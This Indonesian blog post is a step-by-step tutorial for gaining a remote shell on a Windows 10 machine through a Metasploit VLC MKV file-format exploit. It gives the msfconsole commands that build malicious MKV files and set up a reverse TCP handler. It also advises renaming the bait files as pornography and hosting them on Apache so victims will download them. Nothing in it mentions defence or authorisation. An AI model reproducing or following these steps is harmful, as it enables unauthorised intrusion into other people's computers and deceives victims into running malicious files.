 |
| Hacking Win10 x64 Menggunakan Exploit VLC |
Kali ini kita mencoba masuk ke dalam operating system berbasis windows, tepatnya Windows 10 x64. Menggunakan exploit VLC
sebelumnya, apa itu VLC?
VLC adalah piranti lunak untuk memutar beragam jenis file multimedia (video dan audio), dalam berbagai format.
salah satu kelebihan VLC adalah, kelengkapan codec yang dimiliki. dengan kata lain bahwa VLC dapat memutas hampir seluruh jenis multimedia.
tapi dibalik semua kelebihan yang dimiliki VLC, piranti ini memiliki bug yang bisa berakibat fatal, terdapat celah yang membuka jalan masuk dari luar ke dalam komputer pengguna.
celah inilah yang akan dicontohkan, bagaimana caranya seorang masuk memanfaatkan codec VLC.
Pada video ini, kita akan menggunakan umpan file video yang dapat diputar menggunakan VLC.
OS yang digunakan adalah Kali Linux dengan Metasploit.
Pertama buka metasploit. pada terminal ketikkan:
$ msfconsole
kita akan diarahkan masuk ke dalam console metasploit, kemudian gunakan exploit windows dengan format vlc_mkv. pada msf console ketikkan:
msf5 > use exploit/windows/fileformat/vlc_mkv
kita diarahkan masuk ke dalam bilik "exploit/windows/fileformat/vlc_mkv". pada bagian ini, kita akan melakukan beberapa set:
set LHOST
msf5 exploit(windows/fileformat/vlc_mkv) > set LHOST (ip kita)
catatan:
pada tulisan (ip kita) diatas, masukkan ip komputer kita, yang bisa di cek menggunakan perintah "ifconfig"
selanjutnya ketikkan:
msf5 exploit(windows/fileformat/vlc_mkv) > exploit
setelah perintah "exploit" dijalankan, maka akan tampil 2 buah file video (format mkv).
seperti yang terlihat pada gambar dibawah ini:
di dalam gambar di atas, terlihat 2 buah file video (part1 dan part 2).
part1 harus dijalankan target (contain exploit)
part2 diletakkan satu folder dengan part1
lokasi default penyimpanan file umpan ini ada pada:
"/home/nama_user/.msf4/local/"
masuk ke folder lokasi umpan, buka terminal baru dan ketikkan:
$ cd ~/.msf4/
kemudian masuk ke dalam folder "local"
$ cd local/
disini kita akan menemukan dua file video yang akan dijadikan umpan kepada target.
copy file umpan ini ke web folder agar bisa diakses oleh target. lokasi folder nya ada pada:
"var/www/html"
$ sudo cp nama_file_umpan-part1.mkv /var/www/html/p0rn-part1.mkv
catatan:
nama_file_umpan-part1.mkv sengaja dire-name menjadi p0rn-part1.mkv untuk meningkatkan daya tarik kepada target untuk mendownloadnya.
lakukan hal yang sama kepada file umpan part2:
$ sudo cp nama_file_umpan-part2.mkv /var/www/html/p0rn-part2.mkv
sekarang beralih ke folder "/var/www/html", untuk memastikan di dalamnya telah dicopy file umpan.
jika telah dipastikan file umpan telah masuk ke dalam folder dimaksud, sekarang kita akan mengaktifkan service servernya (apache), agar dapat diakses.
$ service apache2 start
setelah service apache telah diaktifkan, beralih ke tab terminal sebelumnya, yaitu pada console metasploit.
kita akan menghubungkan payload nya.
msf5 exploit(windows/fileformat/vlc_mkv) > use exploit/multi/handler
kemudian set payloadnya
msf5 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp
set LHOST
msf5 exploit(multi/handler) > set LHOST (ip_komputer_kita)
jalankan exploit
msf5 exploit(multi/handler) > exploit
sekarang kita hanya menuggu target mengaskses file umpan tadi.
tentang bagaimana caranya agar target mau mendownload file tersebut, terserah. bisa dengan cara mengirimkan pesan singkat. atau memasang nya pada link website.
untuk mempersingkat waktu. kita asumsikan saja bahwa target telah mendownload file umpan tadi dan menjalankannya pada VLC player.
Pada console, akan ditampilkan shell yang terhubung ke komputer target, seperti yang terlihat pada gambar dibawah ini:
coba lakukan beberapa command windows (cmd command).
untuk menjadi perhatian, exploit ini tidak berlaku untuk VLC player versi 3 ke atas.
untuk lebih jelasnya, silahkan simak videonya pada channel youtube saya, durasi 8 menit 12 detik.
silahkan like, share, dan subscribe, jika menurut sobat ini bermanfaat.
selamat beraktifitas, dan terimakasih.
No comments:
Post a Comment